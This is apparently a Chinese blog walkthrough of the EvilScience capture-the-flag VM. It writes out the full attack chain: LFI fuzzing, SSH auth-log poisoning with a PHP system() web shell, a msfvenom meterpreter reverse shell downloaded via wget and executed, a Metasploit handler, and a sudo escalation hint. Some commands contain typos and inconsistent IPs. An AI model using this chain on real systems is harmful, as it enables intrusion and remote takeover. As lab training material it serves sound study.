EvilScience靶机详解

主机发现

arp-scan -l

 

bfb0a5e4ed7eff3a9b0210bc4030e7ca.png

得到靶机ip

192.168.229.152

端口扫描

nmap -sV -A -T4 192.168.1.20
这段代码使用 nmap 命令来扫描目标主机 192.168.1.20,并执行以下操作:

    -sV:探测开放的端口,以确定服务/版本信息。
    -A:启用操作系统探测、版本探测、脚本扫描和跟踪路由。
    -T4:设置时间模板,用于平衡速度和准确性。

当运行这段代码时,nmap 将扫描目标主机,并尝试确定开放的端口及其对应的服务和版本信息。它还会执行一些额外的操作,如操作系统探测和跟踪路由。

输出结果将显示目标主机的详细信息,包括开放的端口、服务、版本等。

 

1d2c66164f700f1e88ff978338e60629.png

发现80和22端口是开放的,分别是ssh和http服务

服务网站

http://192.168.229.152/

 

adecb407ff7e5eae67a05cbc6af59d82.png

存在本地文件包含,找到一个邮箱,可能有用

http://192.168.229.152/index.php?file=about.php

 

045c3f427fe314ba07ebe1430db31f68.png

漏洞利用

下载 LFI-JHADDIX.txt(字典)

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt

burpsuite抓包

 

752f380fd60c58fe2359548d4c356081.png

发送intuder爆破

 

98dd165d0989d71ede20c299aec621f9.png

 

299f23ebca65e5a7eb18c09b0ae756d1.png

 

ee6753414e781c869aba992f14a3d4a0.png

复制url访问页面

 

d2b182c92e64ca936f99295389d0ac24.png

没什么有用的信息

http://192.168.229.152/index.php?file=%2fvar%2flog%2flastlog

 

b4e26383465f353676f75afe19dabb76.png

没什么有用的信息

http://192.168.229.152/index.php?file=%2fvar%2frun%2futmp

 

7c56113e3a3cb78f7d186403ef9a74d2.png

此处存在url跳转注意一下

http://192.168.229.152/index.php?file=%2fvar%2flog%2fauth%2elog

 

53c19af26ea69561979017ea5b15c712.png

下面包含其他文件的结果

http://192.168.229.152/index.php?file=/etc/passwd

查看history

 

f0c4bab90c1e6b0af74ef2070ade37f7.png

curl -is 192.168.229.152/index.php?file=/var/log/auth.og

20230724024159.png?origin_url=https%3A%2F%2Fcdn.nlark.com%2Fyuque%2F0%2F2024%2Fpng%2F43104311%2F1726216279064-5d18c84f-737e-49a3-908f-fc71e8b0064e.png&pos_id=xQXaNb8Z

之后的步骤建议在此处打快照

ssh @root192.168.229.152

20230724024159.png?origin_url=https%3A%2F%2Fcdn.nlark.com%2Fyuque%2F0%2F2024%2Fpng%2F43104311%2F1726216649298-8328eab7-e7b0-4a26-96b1-46aeb6bf492c.png&pos_id=wfQFwIIM

此处输错密码会有错误日志存储,所以可以尝试注入

 

19cc0040b52d899744aa9bdaa395a9ac.png

注入后发现用户名被隐藏

ssh '<?php system($_GET[cmd]);?>'@192.168.229.152

 

58881d449117cffdb0141d79ad4ec314.png

msf监听

写入一句话木马

curl -is 'http://192.168.229.152/index.php?file=/var/log/auth.log&cmd=ls'

20230724024159.png?origin_url=https%3A%2F%2Fcdn.nlark.com%2Fyuque%2F0%2F2024%2Fpng%2F43104311%2F1726219110948-60294317-113b-47c2-892d-f788af35edec.png&pos_id=w3tS8AID

msf生成木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.229.141 LPORT

 

df9adca826efc5af5d7d064a893cf367.png

将生成的木马放入本机免杀盘,在文件处开启http服务

python -m http.server

 

b733f6cc9cfd451169bc042fd74f9d2f.png

通过浏览器上传一句话木马

http://192.168.229.152/index.php?file=var/log/auth.log&d1no=system(%27wget+192.168.110.17:7878/shell.elf%27)%3b
http://192.168.229.152/index.php?file=/var/log/auth.log&d1no=system(%27chmod+%2bx+shell.elf%27)%3b
?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

kali开启监听

msfconsole
use exploit/multi/handler 
set payload linux/x86/meterpreter/reverse_tcp
set lport 5757
set lhost 192.168.229.141
run

监听成功

 

b7fccfccb256d60f9e30af34571ac9fc.png

进入交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

查看免密操作

sudo -l
sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

 

b9c7757ecb7cb7e480cb40d9477185b1.png

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值